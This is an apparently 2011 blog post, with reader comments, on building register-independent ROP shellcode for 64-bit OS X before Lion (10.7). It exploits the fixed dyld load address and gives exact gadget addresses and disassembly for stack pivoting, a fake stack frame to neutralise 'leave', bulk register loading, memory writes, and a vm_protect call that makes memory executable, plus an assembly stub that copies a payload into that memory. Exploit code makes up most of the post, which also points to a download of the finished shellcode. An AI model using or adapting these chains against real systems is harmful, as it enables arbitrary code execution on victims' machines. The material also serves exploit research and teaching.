Universal ROP shellcode for OS X x64

One of the hurdles you will encounter during OS X exploitation is the ASLR/DEP combination for 64-bit processes (32-bit processes don’t have DEP [1]). When implemented correctly, it’s an effective mitigation that can be circumvented only with an info leak. (Un)fortunately, OS X versions up to, but not including, the recent Lion (10.7) offer only incomplete ASLR, which still allows attackers to execute arbitrary code. One of the problems (among others) is that the dyld (dynamic loader) image is located at the same address in every process. This makes ROP possible: by controlling the stack, we can reuse snippets of code from dyld and, in effect, execute arbitrary code.

The only public ROP dyld shellcode for OS X was presented in [1]. Charlie Miller’s version works under the assumption that rax and rdi hold specific values. Due to the x64 calling convention [2], it is very probable that this precondition is met. Nevertheless, it would be useful to create a shellcode with weaker assumptions, and that’s exactly what this post is about. We will create a generic ROP shellcode, similar to sayonara, but for OS X :).

Stack pivoting

We assume that rsp is fully controlled. Sometimes achieving such a state is a nontrivial task in itself: for every bug, exploitation can begin with different register/memory values. In [1], an easy case of stack pivoting is described: we start with rax pointing to controlled memory and rdi pointing to a valid buffer. We then set rsp = rax with:

0x00007fff5fc24c8b mov    QWORD PTR [rdi+0x38],rax
(irrelevant)
0x00007fff5fc24cd8 mov    rsp,QWORD PTR [rdi+0x38]
0x00007fff5fc24cdc pop    rdi
0x00007fff5fc24cdd ret

Easy! The problem is, we might not be lucky enough to start with rax pointing to fully controlled memory. For example, we may start with the following:

call [rax+0x100]

Here, memory in the range [rax, rax+0xF0] is random, and we control the buffer starting at rax+0xF1. Starting conditions are different for every bug, and pivoting the stack can be even harder than creating a ROP chain: during pivoting the state we start with can be completely arbitrary, whereas during ROP we already control the stack.

There is no generic way to remedy this problem, but having a large database of usable gadgets would certainly help :). That brings us to an annoying problem: the “leave” instruction. “Leave” is equivalent to:

mov rsp, rbp
pop rbp

If we don’t control rbp, we will lose control of the stack. The problem is, “leave” is very often present before “ret”, effectively limiting the number of gadgets we can use.
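
To make the effect concrete, here is a minimal toy model of “leave / ret” in Python. It is only a sketch: the addresses and stack contents are made up for illustration, and the dictionary stands in for memory. It shows that after “leave”, rsp follows rbp, so the return address is fetched from wherever rbp pointed and not from our controlled stack.

```python
# Toy model of `leave; ret` on a 64-bit stack (not real machine state).
def leave_ret(regs, mem):
    """Apply `leave` (mov rsp, rbp; pop rbp) followed by `ret`."""
    regs = dict(regs)                  # work on a copy
    regs["rsp"] = regs["rbp"]          # mov rsp, rbp
    regs["rbp"] = mem[regs["rsp"]]     # pop rbp
    regs["rsp"] += 8
    regs["rip"] = mem[regs["rsp"]]     # ret
    regs["rsp"] += 8
    return regs

# Hypothetical values: 0x1000 is the stack we control, 0x9000 is wherever
# rbp happened to point when the bug triggered.
mem = {0x9000: 0x1111, 0x9008: 0x2222}
before = {"rsp": 0x1000, "rbp": 0x9000, "rip": 0}
after = leave_ret(before, mem)
print(hex(after["rsp"]), hex(after["rip"]))
```

In this model the next instruction pointer comes from 0x9008, an address derived purely from rbp, and rsp no longer points anywhere near 0x1000.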

Fortunately, there is a little trick that will allow us to use any “leave” gadget. We need to create a “fake” stack frame with a series of 3 indirect calls, like so:

call [rax]+------------+
(...)<--------------+  |
call [rax+4]+       |  |
            |       |  +----> push rbp
            |       |         mov  rbp, rsp
+-----------+       |         (...)
|                   |         call [rax+8]+
|                   |                     |
+-->continue        |      +--------------+
                    |      |
                    |      |
                    |      +->(gadget)
                    |         leave
                    +--------+ret

Start from call [rax] and follow the execution flow along the arrows. With such a construct, we can safely call any gadget ending with “leave / ret”. Such sequences (two indirect calls with different displacements near each other) may be rare, but we don’t need many of them; one is sufficient. We can use the second call (call [rax+4]) to jump to a sequence that will perturb rax and then jump back to “call [rax]”, allowing us to use the same “dispatcher” gadget as many times as we need to use a “leaver”. Here’s an example of such a dispatcher, from dyld:

 
DISPATCHER:
__text:00007FFF5FC0D1BF                 call    qword ptr [rax+78h]
__text:00007FFF5FC0D1C2                 mov     rsi, rax
__text:00007FFF5FC0D1C5                 test    rax, rax
__text:00007FFF5FC0D1C8                 jz      short loc_7FFF5FC0D1E0
__text:00007FFF5FC0D1CA                 mov     rax, [rbx]
__text:00007FFF5FC0D1CD                 mov     rcx, rbx
__text:00007FFF5FC0D1D0                 mov     rdx, r12
__text:00007FFF5FC0D1D3                 mov     rdi, rbx
__text:00007FFF5FC0D1D6                 call    qword ptr [rax+80h]

FAKE FRAME SETUP:
__text:00007FFF5FC0CD44                 push    rbp
__text:00007FFF5FC0CD45                 mov     rbp, rsp
__text:00007FFF5FC0CD48                 mov     [rbp+var_18], rbx
__text:00007FFF5FC0CD4C                 mov     [rbp+var_10], r12
__text:00007FFF5FC0CD50                 mov     [rbp+var_8], r13
__text:00007FFF5FC0CD54                 sub     rsp, 20h
__text:00007FFF5FC0CD58                 mov     r12, rdi
__text:00007FFF5FC0CD5B                 mov     r13d, esi
__text:00007FFF5FC0CD5E                 mov     rax, [rdi]
__text:00007FFF5FC0CD61                 call    qword ptr [rax+1A0h]
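
The bookkeeping behind the fake frame can be traced with a small Python sketch. This is a simplified model under my own assumptions: only rsp and rbp are tracked, return addresses are represented by labels, and the gadget body is assumed not to touch rbp. The point is that the gadget’s “leave” unwinds the frame we just built, so “ret” lands back in the dispatcher no matter what rbp held at the start.

```python
def run_fake_frame(rsp, rbp):
    """Trace rsp/rbp through dispatcher -> frame setup -> leave/ret gadget."""
    mem = {}

    def push(value):
        nonlocal rsp
        rsp -= 8
        mem[rsp] = value

    def pop():
        nonlocal rsp
        value = mem[rsp]
        rsp += 8
        return value

    push("after_first_call")   # dispatcher: call [rax+78h]
    push(rbp)                  # frame setup: push rbp
    rbp = rsp                  # frame setup: mov rbp, rsp
    rsp -= 0x20                # frame setup: sub rsp, 20h
    push("after_frame_call")   # frame setup: call [rax+1A0h]
    # ... the useful part of the "leaver" gadget would run here ...
    rsp = rbp                  # leave: mov rsp, rbp
    rbp = pop()                # leave: pop rbp
    target = pop()             # ret
    return target, rsp, rbp

# Hypothetical starting values; rbp is deliberately garbage.
print(run_fake_frame(0x7000, 0xDEADBEEF))
```

Both rsp and rbp come back unchanged, and control returns to the instruction after the first call in the dispatcher.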

A few preconditions related to register values must be met for the gadgets above to work. Since we don’t control the stack during pivoting, we need to use gadgets ending with indirect jumps or calls to set registers and memory to the necessary values.

The “leave” problem is particularly crippling during pivoting, and that’s when fake frames should be used. During ROP, it’s easier to just control rbp and point it to memory set up earlier.

ROP

The plan is simple: use gadgets from dyld to create an RWX memory area (using vm_protect), then copy normal shellcode to that area and jump to it.

Here’s the vm_protect call we will use to make memory from dyld’s .data section executable:

__text:00007FFF5FC0D34A                 mov     r8d, ebx        ; new_protection
__text:00007FFF5FC0D34D                 xor     ecx, ecx        ; set_maximum
__text:00007FFF5FC0D34F                 mov     rdx, rax        ; size
__text:00007FFF5FC0D352                 mov     rsi, [rbp+address] ; address
__text:00007FFF5FC0D356                 lea     rax, _mach_task_self_
__text:00007FFF5FC0D35D                 mov     edi, [rax]      ; target_task
__text:00007FFF5FC0D35F                 call    _vm_protect
__text:00007FFF5FC0D364                 test    eax, eax
__text:00007FFF5FC0D366                 jz      short loc_7FFF5FC0D38D
__text:00007FFF5FC0D38D loc_7FFF5FC0D38D:
__text:00007FFF5FC0D38D                 cmp     byte ptr [r12+0FAh], 0
__text:00007FFF5FC0D396                 jz      short loc_7FFF5FC0D406
__text:00007FFF5FC0D406 loc_7FFF5FC0D406:
__text:00007FFF5FC0D406                 mov     rbx, [rbp+var_28]
__text:00007FFF5FC0D40A                 mov     r12, [rbp+var_20]
__text:00007FFF5FC0D40E                 mov     r13, [rbp+var_18]
__text:00007FFF5FC0D412                 mov     r14, [rbp+var_10]
__text:00007FFF5FC0D416                 mov     r15, [rbp+var_8]
__text:00007FFF5FC0D41A                 leave
__text:00007FFF5FC0D41B                 retn

This is the same technique as in [1]. A few registers need to be set for this to work: the registers used as parameters for vm_protect, and rbp, to survive the “leave / ret” at the end. We can set them one by one, jumping over different gadgets as described in [1], or set them all at once, using the following:

__text:00007FFF5FC24CA1                 mov     rax, [rdi]
__text:00007FFF5FC24CA4                 mov     rbx, [rdi+8]
__text:00007FFF5FC24CA8                 mov     rcx, [rdi+10h]
__text:00007FFF5FC24CAC                 mov     rdx, [rdi+18h]
__text:00007FFF5FC24CB0                 mov     rsi, [rdi+28h]
__text:00007FFF5FC24CB4                 mov     rbp, [rdi+30h]
__text:00007FFF5FC24CB8                 mov     r8, [rdi+40h]
__text:00007FFF5FC24CBC                 mov     r9, [rdi+48h]
__text:00007FFF5FC24CC0                 mov     r10, [rdi+50h]
__text:00007FFF5FC24CC4                 mov     r11, [rdi+58h]
__text:00007FFF5FC24CC8                 mov     r12, [rdi+60h]
__text:00007FFF5FC24CCC                 mov     r13, [rdi+68h]
__text:00007FFF5FC24CD0                 mov     r14, [rdi+70h]
__text:00007FFF5FC24CD4                 mov     r15, [rdi+78h]
__text:00007FFF5FC24CD8                 mov     rsp, [rdi+38h]
__text:00007FFF5FC24CDC                 pop     rdi
__text:00007FFF5FC24CDD                 retn

We can fill a buffer from dyld’s .data section with values we want to set registers with and simply call the above gadget. The only problem with this approach is rsp being overwritten (mov rsp, [rdi+38h]), but we can remedy this by creating a “fake” stack somewhere in memory :).
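
The buffer layout can be read straight off the offsets in the listing. As a rough sketch (the helper name and the example values are mine and purely illustrative), the following Python packs register values into a 0x80-byte image at those offsets. Note that the slot at 0x20 is not read by the gadget, and rdi itself is popped from the new stack afterwards.

```python
import struct

# Offsets taken from the "mov reg, [rdi+N]" instructions in the listing above.
OFFSETS = {
    "rax": 0x00, "rbx": 0x08, "rcx": 0x10, "rdx": 0x18,
    "rsi": 0x28, "rbp": 0x30, "rsp": 0x38,
    "r8": 0x40, "r9": 0x48, "r10": 0x50, "r11": 0x58,
    "r12": 0x60, "r13": 0x68, "r14": 0x70, "r15": 0x78,
}

def build_context(values):
    """Return an 0x80-byte image; registers not listed are left as zero."""
    buf = bytearray(0x80)
    for reg, value in values.items():
        struct.pack_into("<Q", buf, OFFSETS[reg], value)
    return bytes(buf)

# Placeholder values only: rbx = 7 stands for read|write|execute bits, and
# the rsp value is a made-up address of the "fake" stack.
ctx = build_context({"rbx": 7, "rsp": 0x1122334455667788})
print(ctx.hex())
```
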
Below is a WRITE MEM gadget sequence we can use.

__text:00007FFF5FC23373                 pop     rbx
__text:00007FFF5FC23374                 retn

__text:00007FFF5FC24CDC                 pop     rdi
__text:00007FFF5FC24CDD                 retn

__text:00007FFF5FC24CE1                 mov     [rdi+8], rbx
__text:00007FFF5FC24CE5                 mov     [rdi+10h], rcx
__text:00007FFF5FC24CE9                 mov     [rdi+18h], rdx
__text:00007FFF5FC24CED                 mov     [rdi+20h], rdi
__text:00007FFF5FC24CF1                 mov     [rdi+28h], rsi
__text:00007FFF5FC24CF5                 mov     [rdi+30h], rbp
__text:00007FFF5FC24CF9                 mov     [rdi+38h], rsp
__text:00007FFF5FC24CFD                 add     qword ptr [rdi+38h], 8
__text:00007FFF5FC24D02                 mov     [rdi+40h], r8
__text:00007FFF5FC24D06                 mov     [rdi+48h], r9
__text:00007FFF5FC24D0A                 mov     [rdi+50h], r10
__text:00007FFF5FC24D0E                 mov     [rdi+58h], r11
__text:00007FFF5FC24D12                 mov     [rdi+60h], r12
__text:00007FFF5FC24D16                 mov     [rdi+68h], r13
__text:00007FFF5FC24D1A                 mov     [rdi+70h], r14
__text:00007FFF5FC24D1E                 mov     [rdi+78h], r15
__text:00007FFF5FC24D22                 mov     rsi, [rsp+0]
__text:00007FFF5FC24D26                 mov     [rdi+80h], rsi
__text:00007FFF5FC24D2D                 retn

First we pop the value, then the address, and finally set memory with “mov [rdi+8], rbx”. Notice that we also trash values higher in memory, from rdi+0x10 to rdi+0x80, so we need to remember to write to LOWER addresses first.
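
The ordering constraint is easy to check with a toy model. In this sketch (my own simplification: memory is a dictionary and everything the gadget stores besides rbx is treated as junk), writing in ascending address order preserves every value, while descending order destroys all but the lowest one.

```python
JUNK = object()  # stands in for whatever the other registers contain

def write_qword(mem, target, value):
    """Model the WRITE MEM sequence: store value at target, clobber above it."""
    rdi = target - 8                    # the store goes to [rdi+8]
    mem[rdi + 8] = value                # mov [rdi+8], rbx
    for off in range(0x10, 0x88, 8):    # mov [rdi+10h] .. [rdi+80h], <other regs>
        mem[rdi + off] = JUNK

def write_all(base, values, ascending=True):
    """Write consecutive qwords starting at base; return what ends up in memory."""
    order = list(enumerate(values))
    if not ascending:
        order.reverse()
    mem = {}
    for index, value in order:
        write_qword(mem, base + 8 * index, value)
    return [mem[base + 8 * index] for index in range(len(values))]

good = write_all(0x5000, [10, 20, 30, 40])
bad = write_all(0x5000, [10, 20, 30, 40], ascending=False)
print(good, [v is JUNK for v in bad])
```
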

We could copy our “normal shellcode” to RWX memory using the above sequence, but it would be wasteful in terms of stack space. Observe that to copy a single QWORD, we need 5 QWORDs on the stack (3 gadgets, address, value). It’s more efficient to create a small “stub” that will take care of this.
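
For a sense of scale, here is the arithmetic as a short Python sketch. The function name is hypothetical, and the 5-QWORD figure is the one counted above.

```python
QWORD = 8

def chain_bytes_for_copy(payload_len, qwords_per_write=5):
    """Stack bytes needed to copy payload_len bytes one QWORD at a time."""
    writes = -(-payload_len // QWORD)          # round up to whole QWORDs
    return writes * qwords_per_write * QWORD

print(hex(chain_bytes_for_copy(0x1000)))
```

Copying 0x1000 bytes this way would take 0x5000 bytes of chain, five times the payload itself, which is why a small copy stub is the better deal.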

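; copy normal shellcode to RWX area
; size = 0x1000
stub:
    lea rsi, [r15+offset]           ; source: normal shellcode on the old stack
    xor rcx, rcx
    inc rcx
    shl rcx, 12                     ; rcx = 1 << 12 = 0x1000 bytes to copy
    lea rdi, [rel normal_shellcode] ; destination: right after the stub (rip-relative addressing)
    rep movsb                       ; copy rcx bytes from [rsi] to [rdi]
normal_shellcode: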

rsi is set to point to the old stack (passed in r15); the normal shellcode starts at a constant offset from it. We save a bit of space by using rip-relative addressing (an x64 feature) to set rdi, rather than a constant 8-byte address.
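
What the stub does can be mirrored in a few lines of Python. This is only a model under stated assumptions: the byte arrays stand in for the old stack and the RWX area, the index values are invented, and the direction flag is assumed clear so that “rep movsb” copies forward.

```python
def run_stub(old_stack, offset, rwx, stub_end):
    """Mimic the stub: copy 0x1000 bytes to the address right after the stub."""
    rcx = 0            # xor rcx, rcx
    rcx += 1           # inc rcx
    rcx <<= 12         # shl rcx, 12  -> 0x1000
    rsi = offset       # lea rsi, [r15+offset]  (r15 modeled as index 0)
    rdi = stub_end     # lea rdi, [rel normal_shellcode]
    while rcx:         # rep movsb
        rwx[rdi] = old_stack[rsi]
        rsi += 1
        rdi += 1
        rcx -= 1
    return rdi         # one past the last byte written

# Made-up data: a recognizable byte pattern plays the role of the payload.
old_stack = bytes(range(256)) * 0x20
rwx = bytearray(0x2000)
end = run_stub(old_stack, 0x100, rwx, 0x20)
print(hex(end))
```

Because the destination is the label immediately following “rep movsb”, execution simply falls through into the freshly copied code once the copy finishes.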

To summarize:

  • set register values in dyld’s .data buffer
  • create a fake stack and a fake stack frame in memory
  • copy stub to future RWX area
  • set all registers to correct values
  • use vm_protect to create RWX area
  • load r15 with previous stack pointer
  • jump to RWX memory
  • stub will copy our “normal” shellcode from old stack to RWX mem
  • ???
  • PROFIT!

That’s it. The resulting ROP shellcode is bigger than the one in [1], but it doesn’t assume anything about registers. There is room for improvement, but in environments where you can spray megabytes of memory with JavaScript (like in Safari ;)), the size of the shellcode is not critical.

You can download the final version here.

References:

[1] Charlie Miller, Mac OS X Hacking (Snow Leopard Edition), 2010

[2] Jon Larimer, Intro to x64 Reversing, 2011

  1. Eivind
    25/07/2011 at 02:07

    That is very clever, did it take a long time to figure out?

    • 25/07/2011 at 08:08

      2 days to finish shellcode and write this post. It’s simple if you have a bit of exp. in exploit dev.

  2. 25/07/2011 at 20:38

    Nice work!

  3. Eivind
    25/07/2011 at 21:22

    I must also say that it is so interesting that i just might look into exploit dev!

  4. miki4you
    09/08/2011 at 19:13

    great work !

    how many years did it take to learn assembler so well?
    I’m only 16 years old and I have 2+ years of experience in C and C++, writing some very useful programs 🙂 I also read the book The Art of Exploitation, but I think assembler is one of the heaviest things I’ve ever seen.

    • miki4you
      09/08/2011 at 19:13

      greez from switzerland , and sorry for my english

  5. aLS
    13/09/2011 at 23:04

    Hey man! Excellent work.
    Did you test it with a 64-bit process on 10.7? In two runs of Safari, ‘vmmap pid | grep “usr/lib/dyld”’ showed different addresses on each run for every section :(.

    Thank you in advance.

    • 13/09/2011 at 23:06

      That’s because 10.7 has full ASLR 🙂

  6. aLS
    13/09/2011 at 23:52

    Heh, ok. I thought you were using an inclusive “up to”.
